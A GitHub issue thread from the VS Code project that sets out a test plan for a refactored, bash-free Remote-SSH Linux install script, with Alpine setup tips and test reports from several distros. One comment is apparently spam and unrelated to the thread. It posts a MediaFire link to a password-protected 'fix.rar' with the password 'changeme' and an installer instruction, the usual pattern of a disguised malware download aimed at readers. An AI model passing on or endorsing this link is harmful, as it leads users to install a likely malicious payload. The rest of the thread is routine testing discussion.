### ISSUE TITLE
Test: Refactor of Remote-SSH linux installation script

### ISSUE THREAD

**Issue by joshspicer** [microsoft/vscode#226689]
Refs: https://github.com/microsoft/vscode-remote-release/issues/1747

- [x] windows @chrmarti
- [x] anyOS @anthonykim1

Complexity: 3

[Create Issue](https://github.com/microsoft/vscode/issues/new?body=Testing+%23226689%0A%0A&assignees=joshspicer)

---

Using the latest pre-release Remote-SSH extension, attempt connections to linux-based servers and ensure that both the initial connection and a reconnection work as expected. 

The major change refactored the install script to:
- Not rely on `bash`, meaning that the shell script should execute on any POSIX-compliant machine
- Non-standard flags and programs (eg: `ps`) are not relied on to increase compatibility

Need ideas of what to test against? Here's a [list of issues](https://github.com/microsoft/vscode-remote-release/issues/1747#issuecomment-2311276655) with different OSs that should be resolved now.

It would be great to get coverage with unusual distros and/or use-cases.  Eg: OSs like Alpine that use the 'busybox' suite of tools and do not have bash installed.  Coverage on common distros (ubuntu LTS) are also very useful to ensure to regressions have been introduced.

### Notes

- Ensure that the `useExecServer` setting is enable (this is the default)
- This test plan item should not affect Windows remote servers.

As an example, previously there were several install script related issues to connect to a [clean Alpine installation](https://alpinelinux.org/downloads/). With this change (using v1.31.1 of busybox and no `bash`). The only things I needed to manually configure were:
- Ensure `AllowTcpForwarding` was set to `yes` in the SSHD config (not the default value)
- Install `libstdc++6`, which is a requirement for the VS Code server that is spawned
    - I installed this with `apk add --no-cache libstdc++6`

This test plan should validate that at lease every documented linux target continues to work as expected: https://code.visualstudio.com/docs/remote/linux#_remote-host-container-wsl-linux-prerequisites

**Comment by vineet1401** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by anthonykim1** [comment]
Tips for testing: Make sure to "chmod 600" on the private key file to avoid permission error.

**Comment by anthonykim1** [comment]
Works with Linux(Ubuntu 22.04), Linux (debian 11) -- I think it only list up to debian 10 in the given vscode link but 11 worked when I tried via azure vm. Also works with Linux (centos 8.2.2004)
